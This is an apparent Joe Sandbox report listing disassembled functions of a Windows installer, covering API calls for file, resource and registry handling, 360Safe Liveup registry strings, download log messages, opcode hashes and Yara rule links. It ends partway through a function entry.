                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File_memset$H_prolog3$DeleteDirectoryErrorFindFirstFullLastMoveNamePathRemove_wcslen
                                                                                                                                                                      • String ID: %s\%s$%s\*.*
                                                                                                                                                                      • API String ID: 1197279183-1665845743
                                                                                                                                                                      • Opcode ID: f2cefebd67acc628400d41a2a6ced8caac07f1e732795da5f018db7b0d9603c1
                                                                                                                                                                      • Instruction ID: 0640222ba3949387b974a71c546a608fa0b24c70327bbb1ef63ea37a3d56a019
                                                                                                                                                                      • Opcode Fuzzy Hash: f2cefebd67acc628400d41a2a6ced8caac07f1e732795da5f018db7b0d9603c1
                                                                                                                                                                      • Instruction Fuzzy Hash: A2510C7191029DABDF24EFA5DD49BEF77ACEF24704F004429F909DB181EB74A6048BA4
                                                                                                                                                                      Function 001CE7DF Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CE7FE
                                                                                                                                                                        • Part of subcall function 0018ECB6: __EH_prolog3.LIBCMT ref: 0018ECBD
                                                                                                                                                                        • Part of subcall function 001CE697: __EH_prolog3.LIBCMT ref: 001CE69E
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE887
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00120116,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE8D9
                                                                                                                                                                      • _wcslen.LIBCMT ref: 001CE8EA
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,0017BD49,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE901
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE925
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 001CE92E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileH_prolog3$CloseCreateDeleteHandleWrite_memset_wcslen
                                                                                                                                                                      • String ID: %s\%s.tf
                                                                                                                                                                      • API String ID: 3257772056-3749842194
                                                                                                                                                                      • Opcode ID: 3f47c7874e85eb92869faaf8cea9c2570911b00da3bc7ff2be71360f9aa5d589
                                                                                                                                                                      • Instruction ID: cc5dff4c4d379624bab185ddc56606556cd06b8a038477986d55ed07586d796a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f47c7874e85eb92869faaf8cea9c2570911b00da3bc7ff2be71360f9aa5d589
                                                                                                                                                                      • Instruction Fuzzy Hash: BA417DB1900248ABDF25EFA4DC4AEFE7BB8EF64310F104119F925A7281DB709A44CB61
                                                                                                                                                                      Function 5F517367 Relevance: 16.6, APIs: 11, Instructions: 97registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,00000010,?), ref: 5F517390
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                      • Opcode ID: 4e364f05b014c77b388c442d5e306ec4f58a8d6d45223c01b982cbc60c11d4f9
                                                                                                                                                                      • Instruction ID: b173412430143a81dc2a817eee3ee1d543ddfdf988c2459eb8afee302582ae2a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e364f05b014c77b388c442d5e306ec4f58a8d6d45223c01b982cbc60c11d4f9
                                                                                                                                                                      • Instruction Fuzzy Hash: BD3129B6100601AFE7205F39EC88D96BFF9EB84321B108C3DF59E93510D771A9A8DB50
                                                                                                                                                                      Function 001CA2D7 Relevance: 16.6, APIs: 11, Instructions: 85memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA2E7
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA301
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA311
                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA318
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,001CA3CA,?,00000000,?), ref: 001CA327
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 001CA349
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$Global$AllocFindFreeLoadLockSizeof
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3537612842-0
                                                                                                                                                                      • Opcode ID: bc11070a0a01d139a0b12b5e398329b81532ad6c06127d9de032140560efceda
                                                                                                                                                                      • Instruction ID: 40e78c40914e30ba23b7c0648bf79496606c961a5840f4397b482dea91f32736
                                                                                                                                                                      • Opcode Fuzzy Hash: bc11070a0a01d139a0b12b5e398329b81532ad6c06127d9de032140560efceda
                                                                                                                                                                      • Instruction Fuzzy Hash: AD217131500268BFDB126F60AC5CDEF7B69FFA97543568418FC15D2120EB31CD509A62
                                                                                                                                                                      Function 001D0691 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 140fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D06B0
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000010), ref: 001D06CC
                                                                                                                                                                      • _memset.LIBCMT ref: 001D070A
                                                                                                                                                                        • Part of subcall function 001BD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD74A
                                                                                                                                                                        • Part of subcall function 001BD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD767
                                                                                                                                                                        • Part of subcall function 001BD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD77A
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,?), ref: 001D083D
                                                                                                                                                                        • Part of subcall function 001BEE1E: __EH_prolog3.LIBCMT ref: 001BEE25
                                                                                                                                                                      • _memset.LIBCMT ref: 001D07B9
                                                                                                                                                                      • _memset.LIBCMT ref: 001D07FA
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,0000000C,?), ref: 001D0821
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File_memset$H_prolog3Path$DeleteDirectoryErrorExistsFindFirstFullLastNameRemove
                                                                                                                                                                      • String ID: %s\%s$%s\*.*
                                                                                                                                                                      • API String ID: 3885202939-1665845743
                                                                                                                                                                      • Opcode ID: c96f91831df795bd9ae0f84106779c3f2f49818c4afca1b6f3b78ac9bdbd7dcc
                                                                                                                                                                      • Instruction ID: ac727f5010a9e9bd4ea3a1638f775566e0c138288d5db8cfea03c38aba697d49
                                                                                                                                                                      • Opcode Fuzzy Hash: c96f91831df795bd9ae0f84106779c3f2f49818c4afca1b6f3b78ac9bdbd7dcc
                                                                                                                                                                      • Instruction Fuzzy Hash: 02513F7191028DABDF25EFA5DC85BEF77A8EF18704F00442AF909DB141EB34A604CBA4
                                                                                                                                                                      Function 001976FE Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000006,0000044C), ref: 00197744
                                                                                                                                                                        • Part of subcall function 0018E185: GetDC.USER32(?), ref: 0018E193
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001977B4
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 001977D0
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0019780F
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 00197831
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0019784D
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00197880
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 001978A3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRectWindow$Item$CompatibleCreateObjectSelectViewport_malloc
                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                      • API String ID: 3600242490-364855578
                                                                                                                                                                      • Opcode ID: 734d9f2f310319de8a7ffbcaf2fb0436c73ffb9b08c49283a1c09c3ecfe6ab1b
                                                                                                                                                                      • Instruction ID: 7f02f24ed7cbb7414cbe7c63ec2bb1a46e7153e53391bec500336d509e058e74
                                                                                                                                                                      • Opcode Fuzzy Hash: 734d9f2f310319de8a7ffbcaf2fb0436c73ffb9b08c49283a1c09c3ecfe6ab1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C512970900608AFDF15EFA4DC89EEEBBB9FFA9704F40041EF516A21A1EB716505CB20
                                                                                                                                                                      Function 5F4E55CE Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 125COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4E55D5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,5F4FB438,00000000,?,?,5F4FC3E5,?,00000007,?), ref: 5F4E5643
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] ErrorCode =%d,StartDownload, xrefs: 5F4E56A3
                                                                                                                                                                      • [%d.] ErrorCode =%d,, xrefs: 5F4E5650
                                                                                                                                                                      • [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d , xrefs: 5F4E56F2
                                                                                                                                                                      • [%d.] , xrefs: 5F4E55EB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorH_prolog3Last_memsetwvnsprintf
                                                                                                                                                                      • String ID: [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d $[%d.] $[%d.] ErrorCode =%d,$[%d.] ErrorCode =%d,StartDownload
                                                                                                                                                                      • API String ID: 2481933832-1659077646
                                                                                                                                                                      • Opcode ID: 83e3ef696064a459706792e3ce2d97229277803e2699c61eef993f288d9c24aa
                                                                                                                                                                      • Instruction ID: 9a049e8ecc867252e44e27a0ca6f550f673a8b664b8b6c68f675badea131e242
                                                                                                                                                                      • Opcode Fuzzy Hash: 83e3ef696064a459706792e3ce2d97229277803e2699c61eef993f288d9c24aa
                                                                                                                                                                      • Instruction Fuzzy Hash: E0510CB1505701EBDB51DFB4C844B96BBE2FF48310F10862AE96EDB391D732A464CBA1
                                                                                                                                                                      Function 5F4D9657 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • %s.%u, xrefs: 5F4D96CB
                                                                                                                                                                      • [%d.] RenameFile file(%s) already exist, xrefs: 5F4D96EE
                                                                                                                                                                      • [%d.] MoveFile fail, error code is %d, xrefs: 5F4D971C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CountDeleteErrorLastMoveTick
                                                                                                                                                                      • String ID: %s.%u$[%d.] MoveFile fail, error code is %d$[%d.] RenameFile file(%s) already exist
                                                                                                                                                                      • API String ID: 804011810-1231871111
                                                                                                                                                                      • Opcode ID: 3e8d06326046c3d4b51c0ed881bb3267adfa32fb5402de3fcbbe9acc592893aa
                                                                                                                                                                      • Instruction ID: a24511da0bf435e7d104e3927dcaf27702c84ade4df86ea28834d548bc4ee49b
                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8d06326046c3d4b51c0ed881bb3267adfa32fb5402de3fcbbe9acc592893aa
                                                                                                                                                                      • Instruction Fuzzy Hash: B131A1B2501204EBD7245FE88D68EAE77FAFF45720F00452EF55BD6240EB31A4108B91
                                                                                                                                                                      Function 001C8657 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001C867B
                                                                                                                                                                      • _memset.LIBCMT ref: 001C868C
                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86A1
                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86B2
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 001C86C2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001C86C9
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86D7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Version_memset$AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                      • API String ID: 675204089-192647395
                                                                                                                                                                      • Opcode ID: 0f5ad22118eb6b7bddef30bcfd75908def594cf0a63ab405f5a6bfc8246a1251
                                                                                                                                                                      • Instruction ID: 4adbb9e28224c53d8e65939e61d05463b6be1abdf995c74c12e152e296c78596
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f5ad22118eb6b7bddef30bcfd75908def594cf0a63ab405f5a6bfc8246a1251
                                                                                                                                                                      • Instruction Fuzzy Hash: E9114F71D102289BDF10EBE5AC49FEE77A8AF14708F010559E525E7180EF74D505CA91
                                                                                                                                                                      Function 001E3120 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001E3142
                                                                                                                                                                        • Part of subcall function 001E2050: _memset.LIBCMT ref: 001E2085
                                                                                                                                                                        • Part of subcall function 001E2050: _memset.LIBCMT ref: 001E212B
                                                                                                                                                                        • Part of subcall function 001E2050: _strncat.LIBCMT ref: 001E21AF
                                                                                                                                                                      • _memset.LIBCMT ref: 001E31C9
                                                                                                                                                                      • SHSetValueA.SHLWAPI ref: 001E31FA
                                                                                                                                                                      • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 001E3269
                                                                                                                                                                      • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 001E3298
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Value$_strncat
                                                                                                                                                                      • String ID: Software\360Safe\Liveup$mid$mid_old
                                                                                                                                                                      • API String ID: 2533611499-1528303271
                                                                                                                                                                      • Opcode ID: 5f466edea0a015b95ff9d7f65f2309c3bea37534de5d6aa920ef2aa9685ad0cd
                                                                                                                                                                      • Instruction ID: 5a7bd90926b237d62cec2ba4ff88848cf1c8a945ac2f71be2ff9413592d13133
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f466edea0a015b95ff9d7f65f2309c3bea37534de5d6aa920ef2aa9685ad0cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 464129316087C26BE721CB25DC99FFB77D9AF95700F04450DEAD987181EB719608C792
                                                                                                                                                                      Function 001CA6F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001CA71F
                                                                                                                                                                      • _memset.LIBCMT ref: 001CA72D
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001CA741
                                                                                                                                                                      • _memset.LIBCMT ref: 001CA754
                                                                                                                                                                        • Part of subcall function 001A12A8: _memset.LIBCMT ref: 001A12EC
                                                                                                                                                                        • Part of subcall function 001A12A8: CoCreateGuid.OLE32(?,?,?,00000800), ref: 001A12F8
                                                                                                                                                                        • Part of subcall function 001A12A8: _memset.LIBCMT ref: 001A1309
                                                                                                                                                                        • Part of subcall function 001A12A8: _wcsncpy.LIBCMT ref: 001A135F
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 001CA784
                                                                                                                                                                      • _wcscat.LIBCMT ref: 001CA796
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 001CA7A4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Path$CombineCreateExistsFileGuidTemp_wcscat_wcsncpy
                                                                                                                                                                      • String ID: .tmp
                                                                                                                                                                      • API String ID: 2935203105-2986845003
                                                                                                                                                                      • Opcode ID: 7f8d7dd592a61377ecd5db3e3ff6a443034fffcd2f0251042148bd9c9b31cd46
                                                                                                                                                                      • Instruction ID: df2d8d0d41282f449cc948f9450323b65ceed6ed6bd68ea60e236dce0076a134
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f8d7dd592a61377ecd5db3e3ff6a443034fffcd2f0251042148bd9c9b31cd46
                                                                                                                                                                      • Instruction Fuzzy Hash: 072165B690021C6BDB11DAA5EC85EDE73BCBF68704F0004AAB305D3041EA74EA448B60
                                                                                                                                                                      Function 5F5204D7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F5204FB
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000001), ref: 5F520528
